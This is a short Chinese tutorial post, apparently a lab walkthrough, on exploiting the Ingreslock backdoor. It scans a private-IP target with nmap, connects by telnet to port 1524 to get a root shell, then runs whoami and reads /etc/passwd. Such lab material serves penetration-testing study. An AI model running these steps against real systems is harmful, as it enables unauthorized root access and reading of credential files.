Ingreslock后门漏洞

发布时间:2020-06-24 12:00:06 作者:白帽生活
来源:网络 阅读:1580

利用telnet命令连接目标主机的1524端口,直接获取root权限。


Ingreslock后门程序监听在1524端口,连接到1524端口就可以直接获得root权限, 经常被用于***一个暴露的服务器


 一、 利用nmap工具扫描目标主机

1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。


1.2 在终端中输入命令“nmap –sV  192.168.1.3”,对目标主机进行端口扫描,发现开放1524端口。


Ingreslock后门漏洞


1.3 在终端中输入命令“telnet 192.168.1.3 1524”,连接目标主机1524端口,先是连接成功。如图3所示


1.4 在终端中输入命令“whoami”,查找获取的权限。如图4所示


Ingreslock后门漏洞



1.5 在终端中输入命令“ifconfig eth0”,查看网卡信息,在终端下输入“cat /etc/passwd”,查看远程主机的密码文件。


Ingreslock后门漏洞

Ingreslock后门漏洞




推荐阅读:
  1. php后门--异或
  2. Metasploit溢出UnrealIRCd后门漏洞

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

后门 ingreslock gr

上一篇:python用什么关键字跳出函数

下一篇:java中的null代表什么

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》